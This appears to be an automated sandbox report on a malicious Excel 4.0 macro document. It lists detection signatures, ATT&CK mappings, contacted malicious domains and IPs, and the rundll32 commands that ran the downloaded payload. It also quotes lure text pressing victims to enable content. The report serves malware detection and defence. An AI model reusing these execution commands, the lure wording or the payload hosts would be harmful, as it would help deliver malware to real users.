Loading ...

Play interactive tourEdit tour

Analysis Report 46747509_by_Libranalysis

Overview

General Information

Sample Name:46747509_by_Libranalysis (renamed file extension from none to xls)
Analysis ID:412137
MD5:46747509aca01f63274d3edfeddb787b
SHA1:8bcb09a42a62453b9437915442ce981896cb4de7
SHA256:00da3dfab496ea65873d53636db189ed7bd46f502386cb014876a75d71d6869b
Tags:SilentBuilder
Infos:

Most interesting Screenshot:

Detection

Hidden Macro 4.0
Score:68
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)
Document exploit detected (UrlDownloadToFile)
Document exploit detected (process start blacklist hit)
Found Excel 4.0 Macro with suspicious formulas
Found abnormal large hidden Excel 4.0 Macro sheet
Sigma detected: Microsoft Office Product Spawning Windows Shell
Document contains embedded VBA macros
JA3 SSL client fingerprint seen in connection with other malware
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)

Classification

Startup

  • System is w7x64
  • EXCEL.EXE (PID: 2548 cmdline: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding MD5: 5FB0A0F93382ECD19F5F499A5CAA59F0)
    • rundll32.exe (PID: 2332 cmdline: rundll32 ..\ritofm.cvm,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
    • rundll32.exe (PID: 960 cmdline: rundll32 ..\ritofm.cvm1,DllRegisterServer MD5: DD81D91FF3B0763C392422865C9AC12E)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

No yara matches

Sigma Overview

System Summary:

barindex
Sigma detected: Microsoft Office Product Spawning Windows ShellShow sources
Source: Process startedAuthor: Michael Haag, Florian Roth, Markus Neis, Elastic, FPT.EagleEye Team: Data: Command: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, CommandLine|base64offset|contains: ], Image: C:\Windows\System32\rundll32.exe, NewProcessName: C:\Windows\System32\rundll32.exe, OriginalFileName: C:\Windows\System32\rundll32.exe, ParentCommandLine: 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding, ParentImage: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE, ParentProcessId: 2548, ProcessCommandLine: rundll32 ..\ritofm.cvm,DllRegisterServer, ProcessId: 2332

Signature Overview

Click to jump to signature section

Show All Signature Results
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

Software Vulnerabilities:

barindex
Document exploit detected (UrlDownloadToFile)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXESection loaded: \KnownDlls\api-ms-win-downlevel-shlwapi-l2-1-0.dll origin: URLDownloadToFileAJump to behavior
Document exploit detected (process start blacklist hit)Show sources
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe
Source: global trafficDNS query: name: signifysystem.com
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: global trafficTCP traffic: 192.168.2.22:49165 -> 192.185.39.58:443
Source: Joe Sandbox ViewJA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\T4O403JZJump to behavior
Source: rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknownDNS traffic detected: queries for: signifysystem.com
Source: E0F5C59F9FA661F6F4C50B87FEF3A15A.0.drString found in binary or memory: http://apps.identrust.com/roots/dstrootcax3.p7c
Source: 77EC63BDA74BD0D0E0426DC8F8008506.0.drString found in binary or memory: http://ctldl.windowsupdate.com/msdownload/update/v3/static/trustedr/en/authrootstl.cab
Source: rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com
Source: rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://investor.msn.com/
Source: rundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XML.asp
Source: rundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: rundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: rundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.hotmail.com/oe
Source: rundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpString found in binary or memory: http://www.icra.org/vocabulary/.
Source: rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpString found in binary or memory: http://www.windows.com/pctv.
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49168
Source: unknownNetwork traffic detected: HTTP traffic on port 49165 -> 443
Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49165
Source: unknownNetwork traffic detected: HTTP traffic on port 49168 -> 443
Source: unknownHTTPS traffic detected: 192.185.39.58:443 -> 192.168.2.22:49165 version: TLS 1.2
Source: unknownHTTPS traffic detected: 192.185.32.232:443 -> 192.168.2.22:49168 version: TLS 1.2

System Summary:

barindex
Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros)Show sources
Source: Screenshot number: 4Screenshot OCR: Enable Editing 11 from the yellow bar above 12 13 Once You have Enable Editing, pleas' " ' "
Source: Screenshot number: 8Screenshot OCR: Enable Editing 11 1 from the yellow bar above 12 13 2 Once You have Enable Editing, please click
Source: Screenshot number: 8Screenshot OCR: Enable Content 14 , from the yellow bar above 15 D e 16 17 I 18 I WHY I CANNOT OPEN THIS DOCUME
Source: Document image extraction number: 5Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Content
Source: Document image extraction number: 5Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? You are using iOS or An
Source: Document image extraction number: 14Screenshot OCR: Enable Editing from the yellow bar above Once You have Enable Editing, please click Enable Conte
Source: Document image extraction number: 14Screenshot OCR: Enable Content from the yellow bar above WHY I CANNOT OPEN THIS DOCUMENT? w You are using IDS or
Found Excel 4.0 Macro with suspicious formulasShow sources
Source: 46747509_by_Libranalysis.xlsInitial sample: CALL
Source: 46747509_by_Libranalysis.xlsInitial sample: CALL
Source: 46747509_by_Libranalysis.xlsInitial sample: EXEC
Found abnormal large hidden Excel 4.0 Macro sheetShow sources
Source: 46747509_by_Libranalysis.xlsInitial sample: Sheet size: 14902
Source: 46747509_by_Libranalysis.xlsOLE indicator, VBA macros: true
Source: rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpBinary or memory string: .VBPud<_
Source: classification engineClassification label: mal68.expl.evad.winXLS@5/11@2/2
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\Desktop\6ADE0000Jump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile created: C:\Users\user\AppData\Local\Temp\CVRCFDC.tmpJump to behavior
Source: 46747509_by_Libranalysis.xlsOLE indicator, Workbook stream: true
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile read: C:\Users\desktop.iniJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CAJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: unknownProcess created: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE 'C:\Program Files\Microsoft Office\Office14\EXCEL.EXE' /automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServer
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm,DllRegisterServerJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess created: C:\Windows\System32\rundll32.exe rundll32 ..\ritofm.cvm1,DllRegisterServerJump to behavior
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: C:\Windows\System32\rundll32.exeAutomated click: OK
Source: Window RecorderWindow detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEKey opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Excel\Resiliency\StartupItemsJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEFile opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dllJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
Source: C:\Windows\System32\rundll32.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

Mitre Att&ck Matrix

Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
Valid AccountsScripting21Path InterceptionProcess Injection1Masquerading1OS Credential DumpingFile and Directory Discovery1Remote ServicesData from Local SystemExfiltration Over Other Network MediumEncrypted Channel2Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
Default AccountsExploitation for Client Execution23Boot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemorySystem Information Discovery2Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothNon-Application Layer Protocol1Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Rundll321Security Account ManagerQuery RegistrySMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationApplication Layer Protocol2Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Process Injection1NTDSSystem Network Configuration DiscoveryDistributed Component Object ModelInput CaptureScheduled TransferIngress Tool Transfer1SIM Card SwapCarrier Billing Fraud
Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptScripting21LSA SecretsRemote System DiscoverySSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings

Behavior Graph

Hide Legend

Legend:

  • Process
  • Signature
  • Created File
  • DNS/IP Info
  • Is Dropped
  • Is Windows Process
  • Number of created Registry Values
  • Number of created Files
  • Visual Basic
  • Delphi
  • Java
  • .Net C# or VB.NET
  • C, C++ or other language
  • Is malicious
  • Internet

Screenshots

Thumbnails

This section contains all screenshots as thumbnails, including those not shown in the slideshow.

windows-stand

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

SourceDetectionScannerLabelLink
46747509_by_Libranalysis.xls4%ReversingLabs

Dropped Files

No Antivirus matches

Unpacked PE Files

No Antivirus matches

Domains

No Antivirus matches

URLs

SourceDetectionScannerLabelLink
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://www.icra.org/vocabulary/.0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe

Domains and IPs

Contacted Domains

NameIPActiveMaliciousAntivirus DetectionReputation
signifysystem.com
192.185.39.58
truefalse
    unknown
    fcventasyservicios.cl
    192.185.32.232
    truefalse
      unknown

      URLs from Memory and Binaries

      NameSourceMaliciousAntivirus DetectionReputation
      http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Checkrundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpfalse
        high
        http://www.windows.com/pctv.rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpfalse
          high
          http://investor.msn.comrundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpfalse
            high
            http://www.msnbc.com/news/ticker.txtrundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpfalse
              high
              http://www.icra.org/vocabulary/.rundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://windowsmedia.com/redir/services.asp?WMPFriendly=truerundll32.exe, 00000002.00000002.2112419601.0000000001D37000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104936408.0000000001D87000.00000002.00000001.sdmpfalse
              • URL Reputation: safe
              • URL Reputation: safe
              • URL Reputation: safe
              unknown
              http://www.hotmail.com/oerundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpfalse
                high
                http://investor.msn.com/rundll32.exe, 00000002.00000002.2112133132.0000000001B50000.00000002.00000001.sdmp, rundll32.exe, 00000003.00000002.2104792768.0000000001BA0000.00000002.00000001.sdmpfalse
                  high

                  Contacted IPs

                  • No. of IPs < 25%
                  • 25% < No. of IPs < 50%
                  • 50% < No. of IPs < 75%
                  • 75% < No. of IPs

                  Public

                  IPDomainCountryFlagASNASN NameMalicious
                  192.185.39.58
                  signifysystem.comUnited States
                  46606UNIFIEDLAYER-AS-1USfalse
                  192.185.32.232
                  fcventasyservicios.clUnited States
                  46606UNIFIEDLAYER-AS-1USfalse

                  General Information

                  Joe Sandbox Version:32.0.0 Black Diamond
                  Analysis ID:412137
                  Start date:12.05.2021
                  Start time:12:36:11
                  Joe Sandbox Product:CloudBasic
                  Overall analysis duration:0h 6m 29s
                  Hypervisor based Inspection enabled:false
                  Report type:full
                  Sample file name:46747509_by_Libranalysis (renamed file extension from none to xls)
                  Cookbook file name:defaultwindowsofficecookbook.jbs
                  Analysis system description:Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of analysed new started processes analysed:6
                  Number of new started drivers analysed:0
                  Number of existing processes analysed:0
                  Number of existing drivers analysed:0
                  Number of injected processes analysed:0
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode:default
                  Analysis stop reason:Timeout
                  Detection:MAL
                  Classification:mal68.expl.evad.winXLS@5/11@2/2
                  EGA Information:Failed
                  HDC Information:Failed
                  HCA Information:
                  • Successful, ratio: 100%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Found warning dialog
                  • Click Ok
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  Show All
                  • Excluded IPs from analysis (whitelisted): 192.35.177.64, 8.248.141.254, 67.27.157.126, 8.253.95.120, 67.27.233.254, 67.26.139.254
                  • Excluded domains from analysis (whitelisted): audownload.windowsupdate.nsatc.net, apps.digsigtrust.com, ctldl.windowsupdate.com, auto.au.download.windowsupdate.com.c.footprint.net, apps.identrust.com, au-bg-shim.trafficmanager.net
                  • Report size getting too big, too many NtDeviceIoControlFile calls found.

                  Simulations

                  Behavior and APIs

                  No simulations

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  UNIFIEDLAYER-AS-1US457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                  • 192.232.222.43
                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                  • 67.20.76.71
                  Revised Invoice pdf.exeGet hashmaliciousBrowse
                  • 192.185.171.219
                  DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                  • 162.241.169.22
                  dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                  • 192.185.171.219
                  RFQ.exeGet hashmaliciousBrowse
                  • 192.185.129.32
                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                  • 162.241.62.63
                  in.exeGet hashmaliciousBrowse
                  • 162.241.244.112
                  PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                  • 162.144.13.239
                  catalog-1908475637.xlsGet hashmaliciousBrowse
                  • 108.167.180.164
                  catalog-1908475637.xlsGet hashmaliciousBrowse
                  • 108.167.180.164
                  export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                  • 108.179.232.90
                  XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                  • 162.241.190.216
                  QTFsui5pLN.xlsmGet hashmaliciousBrowse
                  • 108.179.232.90
                  15j1TCnOiA.xlsmGet hashmaliciousBrowse
                  • 192.185.115.105
                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                  • 162.241.190.216
                  SOA PDF.exeGet hashmaliciousBrowse
                  • 192.185.226.148
                  djBLaxEojp.exeGet hashmaliciousBrowse
                  • 192.185.161.67
                  quotation 35420PDF.exeGet hashmaliciousBrowse
                  • 192.185.41.225
                  REQUEST FOR PRICE QUOTE - URGENT.pdf.exeGet hashmaliciousBrowse
                  • 162.241.24.59
                  UNIFIEDLAYER-AS-1US457b22da_by_Libranalysis.exeGet hashmaliciousBrowse
                  • 192.232.222.43
                  abc8a77f_by_Libranalysis.xlsxGet hashmaliciousBrowse
                  • 67.20.76.71
                  Revised Invoice pdf.exeGet hashmaliciousBrowse
                  • 192.185.171.219
                  DINTEC HCU24021ED.exeGet hashmaliciousBrowse
                  • 162.241.169.22
                  dd9097e7_by_Libranalysis.exeGet hashmaliciousBrowse
                  • 192.185.171.219
                  RFQ.exeGet hashmaliciousBrowse
                  • 192.185.129.32
                  Order 122001-220 guanzo.exeGet hashmaliciousBrowse
                  • 162.241.62.63
                  in.exeGet hashmaliciousBrowse
                  • 162.241.244.112
                  PO-002755809-NO#PRT101 Order pdf.exeGet hashmaliciousBrowse
                  • 162.144.13.239
                  catalog-1908475637.xlsGet hashmaliciousBrowse
                  • 108.167.180.164
                  catalog-1908475637.xlsGet hashmaliciousBrowse
                  • 108.167.180.164
                  export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                  • 108.179.232.90
                  XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                  • 162.241.190.216
                  QTFsui5pLN.xlsmGet hashmaliciousBrowse
                  • 108.179.232.90
                  15j1TCnOiA.xlsmGet hashmaliciousBrowse
                  • 192.185.115.105
                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                  • 162.241.190.216
                  SOA PDF.exeGet hashmaliciousBrowse
                  • 192.185.226.148
                  djBLaxEojp.exeGet hashmaliciousBrowse
                  • 192.185.161.67
                  quotation 35420PDF.exeGet hashmaliciousBrowse
                  • 192.185.41.225
                  REQUEST FOR PRICE QUOTE - URGENT.pdf.exeGet hashmaliciousBrowse
                  • 162.241.24.59

                  JA3 Fingerprints

                  MatchAssociated Sample Name / URLSHA 256DetectionLinkContext
                  7dcce5b76c8b17472d024758970a406bcatalog-1908475637.xlsGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  DHL AWB.xlsxGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  export of purchase order 7484876.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  XM7eDjwHqp.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  QTFsui5pLN.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  15j1TCnOiA.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  e8eRhf3GM0.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  Purchase Agreement.docxGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  551f47ac_by_Libranalysis.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  export of document 555091.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  generated purchase order 6149057.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  fax 4044.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  scan of document 5336227.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  check 24994.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  generated check 8460.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  export of check 209162.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  generated purchase order 045950.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  export of bill 896621.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  invoice 85046.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58
                  copy of invoice 4347.xlsmGet hashmaliciousBrowse
                  • 192.185.32.232
                  • 192.185.39.58

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\77EC63BDA74BD0D0E0426DC8F8008506
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:Microsoft Cabinet archive data, 59863 bytes, 1 file
                  Category:dropped
                  Size (bytes):59863
                  Entropy (8bit):7.99556910241083
                  Encrypted:true
                  SSDEEP:1536:Gs6cdy9E/ABKQPOrdweEz480zdPMHXNY/gLHfIZN:GNOqOrdDdJPAX1LHA/
                  MD5:15775D95513782F99CDFB17E65DFCEB1
                  SHA1:6C11F8BEE799B093F9FF4841E31041B081B23388
                  SHA-256:477A9559194EDF48848FCE59E05105168745A46BDC0871EA742A2588CA9FBE00
                  SHA-512:AC09CE01122D7A837BD70277BADD58FF71D8C5335F8FC599D5E3ED42C8FEE2108DD043BCE562C82BA12A81B9B08BD24B961C0961BF8FD3A0B8341C87483CD1E7
                  Malicious:false
                  Reputation:moderate, very likely benign file
                  Preview: MSCF............,...................I........b.........R.i .authroot.stl.qqp.4..CK..8T....c_.d....A.F....m"...AH)-.%.QIR..$t)Kd.-QQ*..~.L.2.L........sx.}...~....$....yy.A.8;....|.%OV.a0xN....9..C..t.z.,X...,..1Qj,.p.E.y..ac`.<.e.c.aZW..B.jy....^]..+)..!...r.X:.O.. ..Y..j.^.8C........n7R....p!|_.+..<...A.Wt.=. .sV..`.9O...CD./.s.\#.t#..s..Jeiu..B$.....8..(g..tJ....=,...r.d.].xqX4.......g.lF...Mn.y".W.R....K\..P.n._..7...........@pm.. Q....(#.....=.)...1..kC.`......AP8.A..<....7S.L....S...^.R.).hqS...DK.6.j....u_.0.(4g.....!,.L`......h:.a]?......J9.\..Ww........%........4E.......q.QA.0.M<.&.^*aD.....,..]*....5.....\../ d.F>.V........_.J....."....wI..'..z...j..Ds....Z...[..........N<.d.?<....b..,...n......;....YK.X..0..Z.....?...9.3.+9T.%.l...5.YK.E.V...aD.0...Y../e.7...c..g....A..=.....+..u2..X.~....O....\=...&...U.e...?...z....$.)S..T...r.!?M..;.....r,QH.B <.(t..8s3..u[.N8gL.%...v....f...W.y...cz-.EQ.....c...o..n........D*..........2.
                  C:\Users\user\AppData\LocalLow\Microsoft\CryptnetUrlCache\Content\E0F5C59F9FA661F6F4C50B87FEF3A15A
                  Process:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type:data
                  Category:dropped
                  Size (bytes):893
                  Entropy (8bit):7.366016576663508
                  Encrypted:false
